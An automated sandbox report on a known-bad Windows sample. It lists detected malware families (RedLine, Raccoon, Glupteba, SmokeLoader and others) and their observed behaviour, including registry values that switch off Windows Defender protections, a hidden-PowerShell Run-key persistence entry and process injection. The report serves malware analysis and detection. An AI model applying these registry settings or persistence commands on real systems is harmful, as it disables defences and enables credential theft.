Analysis Overview
SHA256
6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d
Threat Level: Known bad
The file 6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
RedLine
Raccoon Stealer payload
DcRat
SmokeLoader
Amadey
Raccoon
ZGRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Glupteba
RedLine payload
Detect ZGRat V1
Modifies Windows Defender Real-time Protection settings
Drops file in Drivers directory
Stops running service(s)
Downloads MZ/PE file
Reads user/profile data of web browsers
Executes dropped EXE
Checks BIOS information in registry
Windows security modification
Loads dropped DLL
Checks computer location settings
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 06:20
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 06:20
Reported
2023-10-26 06:23
Platform
win10v2004-20231020-en
Max time kernel
122s
Max time network
163s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 4936 created 3280 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5YX5hh7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EF25.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FAEF.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Cv3er48.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\F0BC.exe'\"" | C:\Users\Admin\AppData\Local\Temp\F0BC.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mT2BE44.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Dw1EZ08.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\5464.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\uy2bJ6yf.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ed0Mr9BE.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Ti3KL86.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pl5CT78.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\qm8Nc7tt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\vx5hU8bR.exe | N/A |
Checks installed software on the system
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2636 set thread context of 4172 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Qu36gg4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 488 set thread context of 1092 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Xo6051.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1500 set thread context of 516 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4fF062EF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 1164 set thread context of 5376 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dj81PS4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 324 set thread context of 2664 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 1208 set thread context of 5744 | N/A | C:\Users\Admin\AppData\Local\Temp\FAEF.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Drive Tools\is-NF51C.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2JUKL.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-D48GH.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2RMV7.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-3ODBG.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-155AO.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-LR12U.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-PMTJ0.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VU1P4.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-6Q0TS.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-UNODB.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CM61S.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-23T0I.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-BRBO7.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-B8737.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-64KO5.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-V6AHL.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-J04IR.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-BPL08.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-AI8B8.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-2EKR1.tmp | C:\Users\Admin\AppData\Local\Temp\is-6T50F.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\9675.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zSFE22.tmp\Install.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Wg83Mn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8A3E.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\9675.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\6fb8cbfcc0237e85d47902eb39dcf6bd9a706e9030e8e208850fd985b5a4468d.exe
